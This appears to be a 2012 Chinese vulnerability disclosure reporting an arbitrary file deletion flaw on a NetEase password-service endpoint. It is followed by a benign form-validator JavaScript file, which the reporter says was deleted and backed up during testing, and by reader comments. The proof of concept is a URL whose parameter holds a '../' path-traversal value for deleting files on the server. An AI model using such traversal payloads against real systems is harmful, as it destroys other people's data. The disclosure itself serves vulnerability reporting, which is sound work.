2012-07-15: 细节已通知厂商并且等待厂商处理中 2012-07-16: 厂商已经确认,细节仅向厂商公开 2012-07-26: 细节向核心白帽子及相关领域专家公开 2012-08-05: 细节向普通白帽子公开 2012-08-15: 细节向实习白帽子公开 2012-08-29: 细节向公众公开
网易任何删除文件漏洞[严重]
漏洞地址:https://mima.163.com/nie/ts_game_upload_remove.aspx?again=&ran=../nie/images/ts/&id=topImg.jpg 想删哪个换目录即可。测试时删除了2个文件,已备份。Validator_nV2.js
// Unconditionally replaces the native String#trim with a regex-based version.
// Modern engines ship their own; a `if (!String.prototype.trim)` guard would keep
// the native one. Strips leading and trailing whitespace.
String.prototype.trim = function() { return this.replace(/(^\s*)|(\s*$)/g, "");}

/**
 * Form-field validator, keyed by the `dataType` attribute of each form element.
 *
 * Each entry is either a RegExp (tested against the trimmed field value) or a
 * string expression that `Validate` passes to `eval` inside a `with(element)`
 * block, so `value` and `getAttribute(...)` in those strings resolve against the
 * element being checked and `this` is the Validator object. Attribute names the
 * rules read: min, max, to, operator, regexp, accept, format, name, msg, tipId,
 * require, dataType.
 *
 * Assigned without `var`, so it becomes a global. Also relies on the browser
 * globals `document`, `event`, `alert`, `$` and `j` (presumably a jQuery alias --
 * not defined here).
 */
Validator = {
 // Expression-type rules (strings, eval'd by Validate).
 MimaIdCard : "this.IsMimaIdCard(value)",
 Pingma : "this.IsPingma(value)",
 // Non-empty.
 Require : /.+/,
 // Email : /^\w+([-+.]\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*$/,   (superseded by IsEmail)
 Email : "this.IsEmail(value)",
 // Optional area code in parentheses or with a dash, then a 7-8 digit number and optional extension.
 Phone : /^((\(\d{2,3}\))|(\d{3}\-))?(\(0\d{2,3}\)|0\d{2,3}-)?[1-9]\d{6,7}(\-\d{1,4})?$/,
 // 11 digits starting with 13/14/15/18.
 Mobile : /^1[3458]\d{9}$/,
 // http:// only (no https), host then a permissive path character class.
 Url : /^http:\/\/[A-Za-z0-9]+\.[A-Za-z0-9]+[\/=\?%\-&_~`@[\]\':+!]*([^<>\"\"])*$/,
 IdCard : "this.IsIdCard(value)",
 Currency : /^\d+(\.\d+)?$/,
 Number : /^\d+$/,
 // Six digits, no leading zero.
 Zip : /^[1-9]\d{5}$/,
 QQ : "this.IsQQ(value)",
 Integer : /^[-\+]?\d+$/,
 Double : /^[-\+]?\d+(\.\d+)?$/,
 English : /^[A-Za-z]+$/,
 Chinese : /^[\u0391-\uFFE5]+$/,
 // Letter first, then 3+ word characters; case-insensitive.
 Username : /^[a-z]\w{3,}$/i,
 // A string is "unsafe" when it is drawn from a single character class (all upper,
 // all lower, all digits, all punctuation), is 5 characters or shorter, or contains
 // whitespace. Used via IsSafe (negated).
 UnSafe : /^(([A-Z]*|[a-z]*|\d*|[-_\~!@#\$%\^&\*\.\(\)\[\]\{\}<>\?\\\/\'\"]*)|.{0,5})$|\s/,
 IsSafe : function(str) { return !this.UnSafe.test(str); },
 SafeString : "this.IsSafe(value)",
 // Extension whitelist from the `accept` attribute (comma separated).
 Filter : "this.DoFilter(value, getAttribute('accept'))",
 // Length bounds in UTF-16 units; LimitB counts non-ASCII characters as 2.
 Limit : "this.limit(value.length,getAttribute('min'), getAttribute('max'))",
 Limit2 : "this.limit2(value.length, getAttribute('min'), getAttribute('max'))",
 LimitB : "this.limit(this.LenB(value), getAttribute('min'), getAttribute('max'))",
 // NOTE(review): IsDate takes (op, formatString), so the `min` attribute is what
 // lands in formatString here and `format` is ignored -- confirm this is intended.
 Date : "this.IsDate(value, getAttribute('min'), getAttribute('format'))",
 // Must equal the value of the first element named by the `to` attribute.
 Repeat : "value == document.getElementsByName(getAttribute('to'))[0].value",
 // Exclusive bounds; attribute strings are coerced to numbers by the relational operators.
 Range : "getAttribute('min') < (value|0) && (value|0) < getAttribute('max')",
 Compare : "this.compare(value,getAttribute('operator'),getAttribute('to'))",
 // Pattern is read from the element's `regexp` attribute (see Exec).
 Custom : "this.Exec(value, getAttribute('regexp'))",
 // Checkbox/radio group: number of checked inputs sharing `name` must lie in [min, max].
 Group : "this.MustChecked(getAttribute('name'), getAttribute('min'), getAttribute('max'))",
 // Slot 0 holds the form being validated; slots 1.. hold the failing elements.
 // Evaluated at load time, so the script must be loaded after the first form.
 ErrorItem : [ document.forms[0] ],
 // Slot 0 is the header line; slots 1.. are "N:msg" strings (see AddError).
 ErrorMessage : [ "以下原因导致提交失败:\t" ],

 /**
  * Validates every element of a form and shows the first failure.
  *
  * @param {HTMLFormElement} theForm  Form to check; falls back to the global
  *   `event.srcElement` (IE-style global event object) when omitted.
  * @param {number} mode  Error display mode: 4 = alert + focus, 5 = tip elements
  *   (class tips / tip4textarea), anything else (default 1) = xPro / tip4textarea
  *   tip elements.
  * @returns {boolean} true when every checked element passed, false otherwise.
  *
  * Stops at the first failing element (breakFor). Elements hidden via
  * style.display == 'none' or not ":visible" per `j(...)` are skipped; if `j` is
  * unavailable the element is treated as visible.
  */
 Validate : function(theForm, mode) {
   var obj = theForm || event.srcElement;
   var count = obj.elements.length;
   // Reset result arrays, keeping slot 0.
   this.ErrorMessage.length = 1;
   this.ErrorItem.length = 1;
   this.ErrorItem[0] = obj;
   for ( var i = 0; i < count; i++) {
     var breakFor = false;
     // `with` puts the element's properties (value, getAttribute, ...) in scope;
     // the eval'd rule strings above depend on exactly this scoping.
     with (obj.elements[i]) {
       var j_show = true;
       try{ j_show = j("#"+obj.elements[i].id).is(":visible") }catch(e){ j_show = true; }
       if (obj.elements[i].style.display != 'none' && j_show) {
         // Hide any previous tip for this element before re-checking.
         var _tipId = obj.elements[i].getAttribute("tipId");
         if (_tipId != null) { $(_tipId).style.display = 'none'; }
         var _dataType = getAttribute("dataType");
         // Skip elements without a known rule.
         if (typeof (_dataType) == "object" || typeof (this[_dataType]) == "undefined") continue;
         // Optional field left blank passes.
         if (getAttribute("require") == "false" && value.trim() == "") continue;
         switch (_dataType) {
           case "MimaIdCard": case "Pingma": case "IdCard": case "Email": case "QQ": case "Date": case "Repeat": case "Range": case "Compare": case "Custom": case "Group": case "Limit": case "Limit2": case "LimitB": case "SafeString": case "Filter":
             // Expression rules: the string from the table is eval'd here. The code
             // string itself is fixed in this file; the attribute values it reads
             // (min, max, to, regexp, operator, accept) come from the page markup.
             // eval + with make the rule set hard to audit statically; a table of
             // functions taking the element would remove both.
             if (!eval(this[_dataType])) { this.AddError(i, getAttribute("msg")); breakFor = true; }
             break;
           default:
             // RegExp rules.
             if (!this[_dataType].test(value.trim())) { this.AddError(i, getAttribute("msg")); breakFor = true; }
         }
       }
       if (breakFor) break;
     }
   }
   if (this.ErrorMessage.length > 1) {
     mode = mode || 1;
     var errCount = this.ErrorItem.length;
     switch (mode) {
       /* ---------------------------------------- */
       case 4:
         alert(this.ErrorMessage.join("\n"));
         try { this.ErrorItem[1].focus(); } catch (e) { }
         break;
       /* ---------------------------------------- */
       case 5:
         for ( var i = 1; i < errCount; i++) {
           try {
             var _tipId = this.ErrorItem[i].getAttribute("tipId");
             if (_tipId == null) {
               // this.ErrorItem[i].parentNode.style.backgroundColor = "red";
             } else {
               if ($(this.ErrorItem[i].getAttribute("tipId")).className == 'tips') {
                 $(this.ErrorItem[i].getAttribute("tipId")).className = 'error_tips';
               } else if ($(this.ErrorItem[i] .getAttribute("tipId")).className == 'tip4textarea') {
                 $(this.ErrorItem[i].getAttribute("tipId")).className = 'error_tip4textarea';
               }
               if (this.ErrorMessage[i] != "") {
                 // The message text comes from the element's `msg` attribute (with the
                 // "N:" prefix stripped) and is rendered as HTML here. Any markup in a
                 // msg attribute is interpreted; textContent would render it literally.
                 $(this.ErrorItem[i].getAttribute("tipId")).innerHTML = this.ErrorMessage[i] .replace(/\d+:/, "");
               }
               if (this.ErrorItem[i].getAttribute("tipId") == 'tip2') {
                 $(this.ErrorItem[i].getAttribute("tipId")).style.margin = '0px';
               }
               $(this.ErrorItem[i].getAttribute("tipId")).style.display = 'block';
             }
           } catch (e) { alert(e.description + " 5 "); }
         }
         // Focus handling is commented out in both branches; kept for reference.
         if (this.ErrorItem[1].getAttribute("fId") == null) {
           // this.ErrorItem[1].focus();
         } else {
           // alert(this.ErrorItem[1].getAttribute("fId"));
           // $(this.ErrorItem[1].getAttribute("fId")).focus();
         }
         break;
       /* ---------------------------------------- */
       default:
         for ( var i = 1; i < errCount; i++) {
           try {
             var _tipId = this.ErrorItem[i].getAttribute("tipId");
             if (_tipId != null) {
               if ($(_tipId).className == 'xPro') {
                 $(_tipId).className = 'xProerr';
                 $(_tipId).style.display = "";
                 $(_tipId).parentNode.parentNode.className = 'prompt';
               } else if ($(this.ErrorItem[i] .getAttribute("tipId")).className == 'tip4textarea') {
                 $(this.ErrorItem[i].getAttribute("tipId")).className = 'error_tip4textarea';
               }
             }
           } catch (e) { alert(e.description + " 6 "); }
         }
     }
     return false;
   }
   return true;
 },

 /** Inclusive length bound; a falsy min/max (including "0") falls back to 0 / MAX_VALUE. */
 limit : function(len, min, max) { min = min || 0; max = max || Number.MAX_VALUE; return min <= len && len <= max; },

 /** Like limit, but an empty value (len 0) always passes. */
 limit2 : function(len, min, max) { if (len == 0) return true; min = min || 0; max = max || Number.MAX_VALUE; return min <= len && len <= max; },

 /** Byte-ish length: every character outside \x00-\xff counts as 2. */
 LenB : function(str) { return str.replace(/[^\x00-\xff]/g, "**").length; },

 /**
  * Records a failing element and its message.
  * @param {number} index  Index into ErrorItem[0].elements.
  * @param {string} str  Message (the element's `msg` attribute); stored as "N:str".
  */
 AddError : function(index, str) { this.ErrorItem[this.ErrorItem.length] = this.ErrorItem[0].elements[index]; this.ErrorMessage[this.ErrorMessage.length] = this.ErrorMessage.length + ":" + str; },

 /**
  * Tests `op` against a pattern string taken from the `regexp` attribute. The
  * pattern is page-authored, but it is compiled as-is, so a pathological pattern
  * is still run against the field value. A fresh RegExp is built per call, so the
  * "g" flag's lastIndex state does not carry over.
  */
 Exec : function(op, reg) { return new RegExp(reg, "g").test(op); },

 /** Loose (==, <, ...) comparison of two field values selected by `operator`. */
 compare : function(op1, operator, op2) { switch (operator) { case "NotEqual": return (op1 != op2); case "GreaterThan": return (op1 > op2); case "GreaterThanEqual": return (op1 >= op2); case "LessThan": return (op1 < op2); case "LessThanEqual": return (op1 <= op2); default: return (op1 == op2); } },

 /** Counts checked inputs named `name`; min defaults to 1, max to the group size. */
 MustChecked : function(name, min, max) { var groups = document.getElementsByName(name); var hasChecked = 0; min = min || 1; max = max || groups.length; for ( var i = groups.length - 1; i >= 0; i--) if (groups[i].checked) hasChecked++; return min <= hasChecked && hasChecked <= max; },

 /**
  * Extension check: `filter` is "ext1, ext2, ..." and is spliced into the pattern
  * unescaped. Note "\." inside a double-quoted string is just ".", so the dot before
  * the extension matches any character, not only a literal dot.
  */
 DoFilter : function(input, filter) { return new RegExp("^.+\.(?=EXT)(EXT)$".replace(/EXT/g, filter.split( /\s*,\s*/).join("|")), "gi").test(input); },

 /** Empty passes; otherwise 1-16 digits with no leading zero. */
 IsQQ : function(number) { if (number.trim() == '') { return true; } return /^[1-9]\d{0,15}$/.test(number.trim()); },

 /** Non-empty check only; the "7 identical digits" rule below is disabled. */
 IsMimaIdCard : function(number) {
   if (!number || number.trim() == '') { return false; }
   // Reject 7 consecutive identical digits (disabled):
   // return !(/(.)\1{6}/.test(number.trim()));
   return true;
 },

 /**
  * Empty passes; otherwise length must be 6-16. `min` and `max` are assigned
  * without `var` here and therefore leak as globals.
  */
 IsPingma : function(number) { /* if (number || number != '') { return (/^[0-9a-zA-Z\\._]{6,16}$/.test(number)); } return true; */ number = number.trim(); if (number == '') { return true; }else{ min = 6; max = 16; return min <= number.length && number.length <= max; } },

 IsEmail : function(value) { return (/^\w+([-+.]\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*$/.test(value)); },

 /**
  * Chinese resident ID (15- or 18-digit) check: area prefix must be a known code,
  * the embedded date must be valid, and for 18-digit numbers the weighted check
  * digit must match. 15-digit numbers pass once the area and date are valid.
  * The check digit is generated in lowercase ("x") and compared with ==, so an
  * uppercase "X" in the input fails the equality even though the regex accepts it.
  */
 IsIdCard : function(number) {
   var date, Ai;
   var verify = "10x98765432";
   var Wi = [ 7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2 ];
   // Indexed by the first two digits; empty string = unassigned code.
   var area = [ '', '', '', '', '', '', '', '', '', '', '', '北京', '天津', '河北', '山西', '内蒙古', '', '', '', '', '', '辽宁', '吉林', '黑龙江', '', '', '', '', '', '', '', '上海', '江苏', '浙江', '安微', '福建', '江西', '山东', '', '', '', '河南', '湖北', '湖南', '广东', '广西', '海南', '', '', '', '重庆', '四川', '贵州', '云南', '西藏', '', '', '', '', '', '', '陕西', '甘肃', '青海', '宁夏', '新疆', '', '', '', '', '', '台湾', '', '', '', '', '', '', '', '', '', '香港', '澳门', '', '', '', '', '', '', '', '', '国外' ];
   // Group 2 is 9 chars for the 15-digit form and 12 chars for the 18-digit form.
   var re = number .match(/^(\d{2})\d{4}(((\d{2})(\d{2})(\d{2})(\d{3}))|((\d{4})(\d{2})(\d{2})(\d{3}[x\d])))$/i);
   if (re == null) return false;
   if (re[1] >= area.length || area[re[1]] == "") return false;
   if (re[2].length == 12) {
     Ai = number.substr(0, 17);
     date = [ re[9], re[10], re[11] ].join("-");
   } else {
     // 15-digit form: expand the two-digit year to 19xx.
     Ai = number.substr(0, 6) + "19" + number.substr(6);
     date = [ "19" + re[4], re[5], re[6] ].join("-");
   }
   if (!this.IsDate(date, "ymd")) return false;
   var sum = 0;
   for ( var i = 0; i <= 16; i++) { sum += Ai.charAt(i) * Wi[i]; }
   Ai += verify.charAt(sum % 11);
   return (number.length == 15 || number.length == 18 && number == Ai);
 },

 /**
  * Validates a date string by round-tripping it through Date.
  * @param {string} op  The date text.
  * @param {string} formatString  "ymd" (default) or "dmy"; separators - . /.
  *   Two-digit years map to 20xx below 30, else 19xx (GetFullYear).
  * @returns {boolean}
  * Any other format leaves month undefined and returns false.
  */
 IsDate : function(op, formatString) {
   formatString = formatString || "ymd";
   var m, year, month, day;
   switch (formatString) {
     case "ymd":
       m = op.match(new RegExp( "^((\\d{4})|(\\d{2}))([-./])(\\d{1,2})\\4(\\d{1,2})$"));
       if (m == null) return false;
       day = m[6];
       month = m[5] * 1;
       year = (m[2].length == 4) ? m[2] : GetFullYear(parseInt(m[3], 10));
       break;
     case "dmy":
       m = op.match(new RegExp( "^(\\d{1,2})([-./])(\\d{1,2})\\2((\\d{4})|(\\d{2}))$"));
       if (m == null) return false;
       day = m[1];
       month = m[3] * 1;
       year = (m[5].length == 4) ? m[5] : GetFullYear(parseInt(m[6], 10));
       break;
     default:
       break;
   }
   // Rejects month 0 / NaN here, which makes the `month == 0 ? 12` branch below unreachable.
   if (!parseInt(month)) return false;
   month = month == 0 ? 12 : month;
   // Date normalises out-of-range values (e.g. Feb 30), so comparing the parts back
   // detects an invalid calendar date.
   var date = new Date(year, month - 1, day);
   return (typeof (date) == "object" && year == date.getFullYear() && month == (date.getMonth() + 1) && day == date.getDate());
   // Function declaration: hoisted, so it is callable from the switch above.
   function GetFullYear(y) { return ((y < 30 ? "20" : "19") + y) | 0; }
 }
}
一个图片:topImg.jpg
漏洞地址:https://mima.163.com/nie/ts_game_upload_remove.aspx?again=&ran=../nie/images/ts/&id=topImg.jpg
你们懂。
危害等级:高
漏洞Rank:10
确认时间:2012-07-16 17:20
感谢您对网易的关注,漏洞已修复。
暂无
以后要在标题前加:【精华】
+1
这个厉害
删谁的?
@鬼哥 建议标题改为网易任意文件删除漏洞
求详情
@凤凰 对头。任意文件这个描述更好。差点把这位凤凰误认为凤凰网···
@凤凰 写错字了。本来是想这样写的。
说真的。。测试的时候真没想过去备份。。洞主v5